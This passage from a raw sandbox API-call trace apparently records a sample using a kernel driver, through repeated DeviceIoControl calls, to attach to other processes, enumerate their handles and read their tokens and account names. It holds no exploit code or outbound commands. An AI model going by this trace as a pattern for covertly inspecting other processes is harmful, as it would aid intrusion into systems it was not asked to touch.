lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.570] PsLookupProcessByProcessId (in: ProcessId=0x8b4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.570] PsAcquireProcessExitSynchronization () returned 0x0 [0226.570] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc7b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001fc7b30, ApcState=0xfffff880052b35d0) [0226.570] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.570] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.570] PsReleaseProcessExitSynchronization () returned 0x2 [0226.571] ObfDereferenceObject (Object=0xfffffa8001fc7b30) returned 0x12 [0226.571] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.571] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.571] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.571] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c4) returned 0xc8 [0226.571] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.571] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001f6e180, HandleInformation=0x0) returned 0x0 [0226.571] ObOpenObjectByPointer (in: Object=0xfffffa8001f6e180, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.571] ObfDereferenceObject (Object=0xfffffa8001f6e180) returned 0x14 [0226.571] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.571] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.571] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.571] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.571] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.573] CloseHandle (hObject=0xc4) returned 1 [0226.573] CloseHandle (hObject=0xc8) returned 1 [0226.573] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.573] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.573] PsLookupProcessByProcessId (in: ProcessId=0x8c4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.573] PsAcquireProcessExitSynchronization () returned 0x0 [0226.573] KeStackAttachProcess (in: PROCESS=0xfffffa8001f6e180, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f6e180, ApcState=0xfffff880052b35d0) [0226.573] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020fe1a0, HandleInformation=0x0) returned 0x0 [0226.573] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.573] PsReleaseProcessExitSynchronization () returned 0x2 [0226.573] ObfDereferenceObject (Object=0xfffffa8001f6e180) returned 0x12 [0226.573] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.573] ObfDereferenceObject (Object=0xfffffa80020fe1a0) returned 0x1 [0226.573] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.573] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.573] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.573] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x9a, lpOverlapped=0x0) returned 1 [0226.573] PsLookupProcessByProcessId (in: ProcessId=0x8c4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.573] PsAcquireProcessExitSynchronization () returned 0x0 [0226.574] KeStackAttachProcess (in: PROCESS=0xfffffa8001f6e180, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f6e180, ApcState=0xfffff880052b35d0) [0226.574] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020fe2f0, HandleInformation=0x0) returned 0x0 [0226.574] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.574] PsReleaseProcessExitSynchronization () returned 0x2 [0226.574] ObfDereferenceObject (Object=0xfffffa8001f6e180) returned 0x12 [0226.574] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.574] ObfDereferenceObject (Object=0xfffffa80020fe2f0) returned 0x1 [0226.574] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.574] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.574] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.574] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.574] PsLookupProcessByProcessId (in: ProcessId=0x8c4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.574] PsAcquireProcessExitSynchronization () returned 0x0 [0226.574] KeStackAttachProcess (in: PROCESS=0xfffffa8001f6e180, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f6e180, ApcState=0xfffff880052b35d0) [0226.574] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.574] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.574] PsReleaseProcessExitSynchronization () returned 0x2 [0226.574] ObfDereferenceObject (Object=0xfffffa8001f6e180) returned 0x12 [0226.574] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.574] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.574] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.574] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8d4) returned 0xc8 [0226.574] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.574] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001f77b30, HandleInformation=0x0) returned 0x0 [0226.574] ObOpenObjectByPointer (in: Object=0xfffffa8001f77b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.574] ObfDereferenceObject (Object=0xfffffa8001f77b30) returned 0x14 [0226.574] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.574] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.575] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.575] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.575] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.576] CloseHandle (hObject=0xc4) returned 1 [0226.576] CloseHandle (hObject=0xc8) returned 1 [0226.576] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.576] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.576] PsLookupProcessByProcessId (in: ProcessId=0x8d4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.576] PsAcquireProcessExitSynchronization () returned 0x0 [0226.576] KeStackAttachProcess (in: PROCESS=0xfffffa8001f77b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f77b30, ApcState=0xfffff880052b35d0) [0226.576] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001fdc070, HandleInformation=0x0) returned 0x0 [0226.576] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.576] PsReleaseProcessExitSynchronization () returned 0x2 [0226.577] ObfDereferenceObject (Object=0xfffffa8001f77b30) returned 0x12 [0226.577] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.577] ObfDereferenceObject (Object=0xfffffa8001fdc070) returned 0x1 [0226.577] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.577] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.577] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.577] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0226.577] PsLookupProcessByProcessId (in: ProcessId=0x8d4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.577] PsAcquireProcessExitSynchronization () returned 0x0 [0226.577] KeStackAttachProcess (in: PROCESS=0xfffffa8001f77b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f77b30, ApcState=0xfffff880052b35d0) [0226.577] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001fe2dd0, HandleInformation=0x0) returned 0x0 [0226.577] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.577] PsReleaseProcessExitSynchronization () returned 0x2 [0226.577] ObfDereferenceObject (Object=0xfffffa8001f77b30) returned 0x12 [0226.577] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.577] ObfDereferenceObject (Object=0xfffffa8001fe2dd0) returned 0x1 [0226.577] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.577] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.577] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.577] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.577] PsLookupProcessByProcessId (in: ProcessId=0x8d4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.577] PsAcquireProcessExitSynchronization () returned 0x0 [0226.577] KeStackAttachProcess (in: PROCESS=0xfffffa8001f77b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f77b30, ApcState=0xfffff880052b35d0) [0226.577] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.577] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.577] PsReleaseProcessExitSynchronization () returned 0x2 [0226.577] ObfDereferenceObject (Object=0xfffffa8001f77b30) returned 0x12 [0226.578] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.578] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.578] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.578] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8e4) returned 0xc8 [0226.578] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.578] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa800208ab30, HandleInformation=0x0) returned 0x0 [0226.578] ObOpenObjectByPointer (in: Object=0xfffffa800208ab30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.578] ObfDereferenceObject (Object=0xfffffa800208ab30) returned 0x14 [0226.578] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.578] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.578] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.578] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.578] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.580] CloseHandle (hObject=0xc4) returned 1 [0226.580] CloseHandle (hObject=0xc8) returned 1 [0226.580] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.580] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.580] PsLookupProcessByProcessId (in: ProcessId=0x8e4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.580] PsAcquireProcessExitSynchronization () returned 0x0 [0226.580] KeStackAttachProcess (in: PROCESS=0xfffffa800208ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800208ab30, ApcState=0xfffff880052b35d0) [0226.580] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001fe2f20, HandleInformation=0x0) returned 0x0 [0226.580] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.580] PsReleaseProcessExitSynchronization () returned 0x2 [0226.580] ObfDereferenceObject (Object=0xfffffa800208ab30) returned 0x12 [0226.580] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.580] ObfDereferenceObject (Object=0xfffffa8001fe2f20) returned 0x1 [0226.580] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.580] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.580] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.580] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x6c, lpOverlapped=0x0) returned 1 [0226.581] PsLookupProcessByProcessId (in: ProcessId=0x8e4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.581] PsAcquireProcessExitSynchronization () returned 0x0 [0226.581] KeStackAttachProcess (in: PROCESS=0xfffffa800208ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800208ab30, ApcState=0xfffff880052b35d0) [0226.581] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800202cbd0, HandleInformation=0x0) returned 0x0 [0226.581] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.581] PsReleaseProcessExitSynchronization () returned 0x2 [0226.581] ObfDereferenceObject (Object=0xfffffa800208ab30) returned 0x12 [0226.581] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.581] ObfDereferenceObject (Object=0xfffffa800202cbd0) returned 0x1 [0226.581] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.581] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.581] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.581] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.581] PsLookupProcessByProcessId (in: ProcessId=0x8e4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.581] PsAcquireProcessExitSynchronization () returned 0x0 [0226.581] KeStackAttachProcess (in: PROCESS=0xfffffa800208ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800208ab30, ApcState=0xfffff880052b35d0) [0226.581] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.581] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.581] PsReleaseProcessExitSynchronization () returned 0x2 [0226.581] ObfDereferenceObject (Object=0xfffffa800208ab30) returned 0x12 [0226.581] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.581] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.581] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.582] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8f4) returned 0xc8 [0226.582] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.582] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80020a3b30, HandleInformation=0x0) returned 0x0 [0226.582] ObOpenObjectByPointer (in: Object=0xfffffa80020a3b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.582] ObfDereferenceObject (Object=0xfffffa80020a3b30) returned 0x14 [0226.582] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.582] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.582] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.582] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.582] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.586] CloseHandle (hObject=0xc4) returned 1 [0226.586] CloseHandle (hObject=0xc8) returned 1 [0226.586] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.586] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.586] PsLookupProcessByProcessId (in: 